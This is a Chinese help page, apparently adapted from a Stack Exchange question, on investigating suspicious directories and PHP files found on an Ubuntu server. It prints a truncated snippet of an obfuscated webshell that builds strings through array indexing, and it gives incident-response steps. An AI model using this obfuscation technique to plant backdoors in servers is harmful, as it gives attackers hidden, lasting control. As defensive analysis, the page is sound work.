You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

Ubuntu服务器出现异常目录文件 含可疑PHP代码如何排查处置

服务器异常文件排查记录

异常目录与文件截图

上图为服务器上被异常创建的目录及文件截图。

以下为其中一个异常文件内包含的PHP代码片段:

<?php function n1($f2){$s3 = " l_pHi?2f<40s@m3/IaEx" ."1ren6*5g9yL7b#k)chFuod;-.'v" ."(" ."t" ;$o5='';foreach($f2 as $s4){$o5.=$s3[$s4];}return $o5;}$k6 = Array();$k6[] = n1(Array(32,23,15,21,27,10,33,29,44,29>

注意:当前提取到的代码片段不完整,属于典型的混淆型webshell后门特征

  • 代码通过自定义字符集、数组索引拼接的方式混淆真实执行逻辑,完整代码通常具备执行任意系统命令、读写服务器文件、持久化控制服务器的恶意功能
  • 出现该类文件证明服务器已被攻击者成功入侵,需第一时间断网隔离,优先排查Web应用漏洞、弱口令、未授权访问等入侵入口,全量扫描清理所有恶意后门文件,同时排查系统是否存在隐藏账号、恶意定时任务、篡改的系统命令等持久化痕迹,避免攻击者反复入侵。

内容的提问来源于stack exchange,提问作者asega

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.08.28 07:36:31